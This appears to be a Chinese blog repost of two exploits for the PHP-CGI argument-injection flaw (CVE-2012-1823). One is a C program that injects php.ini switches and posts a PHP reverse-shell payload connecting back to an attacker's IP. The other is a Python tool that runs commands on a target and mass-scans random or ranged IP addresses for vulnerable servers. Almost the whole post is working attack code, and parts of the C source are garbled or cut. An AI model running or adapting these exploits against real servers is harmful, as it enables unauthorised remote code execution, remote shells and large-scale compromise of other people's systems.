Apache / PHP 5.x Remote Code Execution Exploit

[php] /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o apache-magika -lssl */ /* This is a code execution bug in the combination of Apache and PHP. On Debian and Ubuntu the vulnerability is present in the default install of the php5-cgi package. When the php5-cgi package is installed on Debian and Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under /cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute the binary because this binary has a security check enabled when installed with Apache http server and this security check is circumvented by the exploit. When accessing the php-cgi binary the security check will block the request and will not execute the binary. In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security check is done when the php.ini configuration setting cgi.force_redirect is set and the php.ini configuration setting cgi.redirect_status_env is set to no. This makes it possible to execute the binary bypassing the Security check by setting these two php.ini settings. Prior to this code for the Security check getopt is called and it is possible to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the -d switch. If both values are set to zero and the request is sent to the server php-cgi gets fully executed and we can use the payload in the POST data field to execute arbitrary php and therefore we can execute programs on the system. apache-magika.c is an exploit that does exactly the prior described. It does support SSL. /* Affected and tested versions PHP 5.3.10 PHP 5.3.8-1 PHP 5.3.6-13 PHP 5.3.3 PHP 5.2.17 PHP 5.2.11 PHP 5.2.6-3 PHP 5.2.6+lenny16 with Suhosin-Patch Affected versions PHP prior to 5.3.12 PHP prior to 5.4.2 Unaffected versions PHP 4 - getopt parser unexploitable PHP 5.3.12 and up PHP 5.4.2 and up Unaffected versions are patched by CVE-2012-1823. */ /* . /'\rrq rk . // \\ . .x.//fco\\-|- '//cmtco\\zt //6meqrg.\\tq //_________\\' EJPGQO apache-magica.c by Kingcope */ #include #include #include #include #include #include #include #include #include #include #include #include typedef struct { int sockfd; SSL *handle; SSL_CTX *ctx; } connection; void usage(char *argv[]) { printf("usage: %s <--target target> <--port port> <--protocol http|https> " \ "<--reverse-ip ip> <--reverse-port port> [--force-interpreter interpreter]\n", argv[0]); exit(1); } char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \ "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \ "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \ "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \ "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \ "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \ "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \ "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" \ "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" \ "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" \ "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" \ "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n" \ "Host: %s\r\n" \ "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" \ "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n" \ "Content-Type: application/x-www-form-urlencoded\r\n" \ "Content-Length: %d\r\n" \ "Connection: close\r\n\r\n%s"; char phpstr[] = " array(\"pipe\", \"r\"),\n" \ " 1 => array(\"pipe\", \"w\"),\n" \ " 2 => array(\"pipe\", \"w\")\n" \ ");\n" \ "$process = proc_open($shell, $descriptorspec, $pipes);\n" \ "if (!is_resource($process)) {\n" \ " printit(\"ERROR: Can't spawn shell\");\n" \ " exit(1);\n" \ "}\n" \ "stream_set_blocking($pipes[0], 0);\n" \ "stream_set_blocking($pipes[1], 0);\n" \ "stream_set_blocking($pipes[2], 0);\n" \ "stream_set_blocking($sock, 0);\n" \ "while (1) {\n" \ " if (feof($sock)) {\n" \ " printit(\"ERROR: Shell connection terminated\");\n" \ " break;\n" \ " }\n" \ " if (feof($pipes[1])) {\n" \ " printit(\"ERROR: Shell process terminated\");\n" \ " break;\n" \ " }\n" \ " $read_a = array($sock, $pipes[1], $pipes[2]);\n" \ " $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n" \ " if (in_array($sock, $read_a)) {\n" \ " if ($debug) printit(\"SOCK READ\");\n" \ " $input = fread($sock, $chunk_size);\n" \ " if ($debug) printit(\"SOCK: $input\");\n" \ " fwrite($pipes[0], $input);\n" \ " }\n" \ " if (in_array($pipes[1], $read_a)) {\n" \ " if ($debug) printit(\"STDOUT READ\");\n" \ " $input = fread($pipes[1], $chunk_size);\n" \ " if ($debug) printit(\"STDOUT: $input\");\n" \ " fwrite($sock, $input);\n" \ " }\n" \ " if (in_array($pipes[2], $read_a)) {\n" \ " if ($debug) printit(\"STDERR READ\");\n" \ " $input = fread($pipes[2], $chunk_size);\n" \ " if ($debug) printit(\"STDERR: $input\");\n" \ " fwrite($sock, $input);\n" \ " }\n" \ "}\n" \ "\n" \ "fclose($sock);\n" \ "fclose($pipes[0]);\n" \ "fclose($pipes[1]);\n" \ "fclose($pipes[2]);\n" \ "proc_close($process);\n" \ "function printit ($string) {\n" \ " if (!$daemon) {\n" \ " print \"$string\n\";\n" \ " }\n" \ "}\n" \ "exit(1);\n" \ "?>"; struct sockaddr_in *gethostbyname_(char *hostname, unsigned short port) { struct hostent *he; struct sockaddr_in server, *servercopy; if ((he=gethostbyname(hostname)) == NULL) { printf("Hostname cannot be resolved\n"); exit(255); } servercopy = malloc(sizeof(struct sockaddr_in)); if (!servercopy) { printf("malloc error (1)\n"); exit(255); } memset(&server, '\0', sizeof(struct sockaddr_in)); memcpy(&server.sin_addr, he->h_addr_list[0], he->h_length); server.sin_family = AF_INET; server.sin_port = htons(port); memcpy(servercopy, &server, sizeof(struct sockaddr_in)); return servercopy; } char *sslread(connection *c) { char *rc = NULL; int received, count = 0, count2=0; char ch; for(;;) { if (!rc) rc = calloc(1024, sizeof (char) + 1); else if (count2 % 1024 == 0) { rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1); } received = SSL_read(c->handle, &ch, 1); if (received == 1) { rc[count++] = ch; count2++; if (count2 > 1024*5) break; } else break; } return rc; } char *read_(int sockfd) { char *rc = NULL; int received, count = 0, count2=0; char ch; for(;;) { if (!rc) rc = calloc(1024, sizeof (char) + 1); else if (count2 % 1024 == 0) { rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1); } received = read(sockfd, &ch, 1); if (received == 1) { rc[count++] = ch; count2++; if (count2 > 1024*5) break; } else break; } return rc; } void main(int argc, char *argv[]) { char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL, *interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL; char httpsflag=0; unsigned short port=0, reverseport=0; struct sockaddr_in *server; int sockfd; unsigned int writesize, tmpsize; unsigned int i; connection *sslconnection; printf("-== Apache Magika by Kingcope ==-\n"); for(;;) { int c; int option_index=0; static struct option long_options[] = { {"target", required_argument, 0, 0 }, {"port", required_argument, 0, 0 }, {"protocol", required_argument, 0, 0 }, {"reverse-ip", required_argument, 0, 0 }, {"reverse-port", required_argument, 0, 0 }, {"force-interpreter", required_argument, 0, 0 }, {0, 0, 0, 0 } }; c = getopt_long(argc, argv, "", long_options, &option_index); if (c < 0) break; switch (c) { case 0: switch (option_index) { case 0: if (optarg) { target = calloc(strlen(optarg)+1, sizeof(char)); if (!target) { printf("calloc error (2)\n"); exit(255); } memcpy(target, optarg, strlen(optarg)+1); } break; case 1: if(optarg) port = atoi(optarg); break; case 2: protocol = calloc(strlen(optarg)+1, sizeof(char)); if (!protocol) { printf("calloc error (3)\n"); exit(255); } memcpy(protocol, optarg, strlen(optarg)+1); if (!strcmp(protocol, "https")) httpsflag=1; break; case 3: reverseip = calloc(strlen(optarg)+1, sizeof(char)); if (!reverseip) { printf("calloc error (4)\n"); exit(255); } memcpy(reverseip, optarg, strlen(optarg)+1); break; case 4: reverseport = atoi(optarg); reverseportstr = calloc(strlen(optarg)+1, sizeof(char)); if (!reverseportstr) { printf("calloc error (5)\n"); exit(255); } memcpy(reverseportstr, optarg, strlen(optarg)+1); break; case 5: forceinterpreter = calloc(strlen(optarg)+1, sizeof(char)); if (!forceinterpreter) { printf("calloc error (6)\n"); exit(255); } memcpy(forceinterpreter, optarg, strlen(optarg)+1); break; default: usage(argv); } break; default: usage(argv); } } if ((optind < argc) || !target || !protocol || !port || !reverseip || !reverseport){ usage(argv); } server = gethostbyname_(target, port); if (!server) { printf("Error while resolving hostname. (7)\n"); exit(255); } char *interpreters[5]; int ninterpreters = 5; interpreters[0] = strdup("/cgi-bin/php"); interpreters[1] = strdup("/cgi-bin/php5"); interpreters[2] = strdup("/cgi-bin/php-cgi"); interpreters[3] = strdup("/cgi-bin/php.cgi"); interpreters[4] = strdup("/cgi-bin/php4"); for (i=0;ihandle = NULL; sslconnection->ctx = NULL; SSL_library_init(); sslconnection->ctx = SSL_CTX_new(SSLv23_client_method()); if (!sslconnection->ctx) { printf("SSL_CTX_new error (11)\n"); exit(255); } sslconnection->handle = SSL_new(sslconnection->ctx); if (!sslconnection->handle) { printf("SSL_new error (12)\n"); exit(255); } if (!SSL_set_fd(sslconnection->handle, sockfd)) { printf("SSL_set_fd error (13)\n"); exit(255); } if (SSL_connect(sslconnection->handle) != 1) { printf("SSL_connect error (14)\n"); exit(255); } } tmpsize = strlen(phpstr) + strlen(reverseip) + strlen(reverseportstr) + 64; tmpstr = (char*)calloc(tmpsize, sizeof(char)); snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport); writesize = strlen(target) + strlen(interpreter) + strlen(poststr) + strlen(tmpstr) + 64; writestr = (char*)calloc(writesize, sizeof(char)); snprintf(writestr, writesize, poststr, interpreter, target, strlen(tmpstr), tmpstr); if (!httpsflag) { write(sockfd, writestr, strlen(writestr)); readbuf = read_(sockfd); } else { SSL_write(sslconnection->handle, writestr, strlen(writestr)); readbuf = sslread(sslconnection); } if (readbuf) { printf("***SERVER RESPONSE***\n\n%s\n\n", readbuf); } else { printf("read error (15)\n"); exit(255); } } exit(1); }[/php] 索性再上一个python的 [php] /usr/bin/env python # # ap-unlock.py - apache + php 5.* rem0te c0de execution 0day # # NOTE: # - quick'n'dirty # - '-x' is missing. copy&paste connect-back shell php code from kingcope's # exploit: http://www.exploit-db.com/exploits/29290/ # - scanner is not multithreaded. as alternative use: # ./pnscan -L10000 -w"GET /cgi-bin/php HTTP/1.0\r\n\r\n" -r "500 # Internal" 80 | grep Apache (or get *scan, harhar) # # by noptrix - http://nullsecurity.net/ import sys import socket import argparse import threading import time import random import select t3st = 'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \ '%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \ '%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \ '%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\ '%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\r\nHost:localhost\r\n'\ 'Content-Type: text/html\r\nContent-Length:1\r\n\r\na\r\n' def enc0dez(): n33dz1 = ('cgi-bin', 'php') n33dz2 = ('-d', 'allow_url_include=on', '-d', 'safe_mode=off', '-d', 'suhosin.simulation=on', '-d', 'disable_functions=""', '-d', 'open_basedir=none', '-d', 'auto_prepend_file=php://input', '-d', 'cgi.force_redirect=0', '-d', 'cgi.redirect_status_env=0', '-d', 'auto_prepend_file=php://input', '-n') fl4g = 0 arg5 = '' p4th = '' plus = '' for x in n33dz2: if fl4g == 1: plus = '+' arg5 = arg5 + plus + \ ''.join('%' + c.encode('utf-8').encode('hex') for c in x) fl4g = 1 for x in n33dz1: p4th = p4th + '/' + \ ''.join('%' + c.encode('utf-8').encode('hex') for c in x) return (p4th.upper(), arg5.upper()) def m4k3_p4yl0rd(p4yl0rd, vuln): p4th, arg5 = enc0dez() if vuln: p4yl0rd = t3st else: p4yl0rd = 'POST /' + p4th + '?' + arg5 + ' HTTP/1.1\r\n' \ 'Host: ' + sys.argv[1] + '\r\n' \ 'Content-Type: application/x-www-form-urlencoded\r\n' \ 'Content-Length: ' + str(len(p4yl0rd)) + '\r\n\r\n' + p4yl0rd return p4yl0rd def s3nd_sh1t(args, vuln): pat = 'Parse error:' try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(float(args.t)) res = s.connect_ex((args.h, int(args.p))) if res == 0: if vuln: p4yl0rd = m4k3_p4yl0rd('', vuln) s.sendall(p4yl0rd) data = s.recv(4096) if pat in data: print "[*] " + args.h + " vu1n" return args.h return else: p4yl0rd = m4k3_p4yl0rd('', vuln) s.sendall(p4yl0rd) while True: rd, wd, ex = select.select([s], [], [], float(args.t)) if rd: data = s.recv(4096) sys.stdout.flush() sys.stdout.write(data) sys.stdout.write('\n') else: return #for line in s.makefile(): # print line, except socket.error: return return def m4k3_r4nd_1p4ddr(num): h0sts = [] for x in range(int(num)): h0sts.append('%d.%d.%d.%d' % (random.randrange(0,255), random.randrange(0,255), random.randrange(0,255), random.randrange(0,255))) return h0sts def sc4n_r4ng3(rsa, rsb, args, vuln): vu1nz = [] for i in range (rsa[0], rsb[0]): for j in range (rsa[1], rsb[1]): for k in range (rsa[2], rsb[2]): for l in range(rsa[3], rsb[3]): args.h = str(i) + "." + str(j) + "." + str(k) + "." + str(l) vu1nz.append(s3nd_sh1t(args, vuln)) time.sleep(0.005) vu1nz = filter(None, vu1nz) return vu1nz def m4k3_ipv4_r4ng3(iprange): a = tuple(part for part in iprange.split('.')) rsa = (range(4)) rsb = (range(4)) for i in range(0,4): ga = a[i].find('-') if ga != -1: rsa[i] = int(a[i][:ga]) rsb[i] = int(a[i][1+ga:]) + 1 else: rsa[i] = int(a[i]) rsb[i] = int(a[i]) + 1 return (rsa, rsb) def parse_args(): p = argparse.ArgumentParser( usage='\n\n ./ap-unlock.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]' \ '\n ./ap-unlock.py -r <4rg> | -R <4rg> [0pt1ons]', formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False) opts = p.add_argument_group('0pt1ons', '') opts.add_argument('-h', metavar='wh1t3h4tz.0rg', help='| t3st s1ngle h0st f0r vu1n') opts.add_argument('-p', default=80, metavar='80', help='| t4rg3t p0rt (d3fau1t: 80)') opts.add_argument('-c', metavar='\'uname -a;id\'', help='| s3nd c0mm4nds t0 h0st') opts.add_argument('-x', metavar='192.168.0.2 1337', help='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll') opts.add_argument('-s', action='store_true', help='| t3st s1ngl3 h0st f0r vu1n') opts.add_argument('-r', metavar='133.1.3-7.7-37', help='| sc4nz iP addr3ss r4ng3 f0r vu1n') opts.add_argument('-R', metavar='1337', help='| sc4nz num r4nd0m h0st5 f0r vu1n') opts.add_argument('-t', default=3, metavar='3', help='| t1me0ut in s3x (d3fau1t: 3)') opts.add_argument('-f', metavar='vu1n.lst', help='| wr1t3 vu1n h0sts t0 f1l3') args = p.parse_args() if not args.h and not args.r and not args.R: p.print_help() sys.exit(0) return args def m41n(): if __name__ == "__main__": print "--==[ ap-unlock.py by noptrix@nullsecurity.net ]==--" vuln = 0 try: args = parse_args() if not args.t: args.t = float(3) if args.h: if args.s: print "[+] sc4nn1ng s1ngl3 h0st %s " % (args.h) vuln = 1 s3nd_sh1t(args, vuln) elif args.c: print "[+] s3nd1ng c0mm4ndz t0 h0st %s " % (args.h) s3nd_sh1t(args, vuln) elif args.x: print "[+] xpl0it1ng b0x %s " % (args.h) print "t0d0" else: print "[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch" sys.exit(-1) if args.r: print "[+] sc4nn1ng r4ng3 %s " % (args.r) vuln = 1 rsa, rsb = m4k3_ipv4_r4ng3(args.r) vu1nz = sc4n_r4ng3(rsa, rsb, args, vuln) if args.R: print "[+] sc4nn1ng %d r4nd0m b0xes" % (int(args.R)) vuln = 1 h0sts = m4k3_r4nd_1p4ddr(int(args.R)) for h0st in h0sts: args.h = h0st s3nd_sh1t(args, vuln) except KeyboardInterrupt: sys.stdout.flush() sys.stderr.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n") raise SystemExit if args.f: if vu1nz: f = open(args.f, "w") f.write("\n".join(vu1nz)+"\n") f.close() else: print "[-] 3rr0r: y0u fuck3d up dud3" sys.exit(1) print "[+] h0p3 1t h3lp3d" m41n()[/php]

1 条评论

  1. 0day5

    需要存在cgi-bin目录。比较鸡肋,害的老衲跑那么远打的去上网看~

发表评论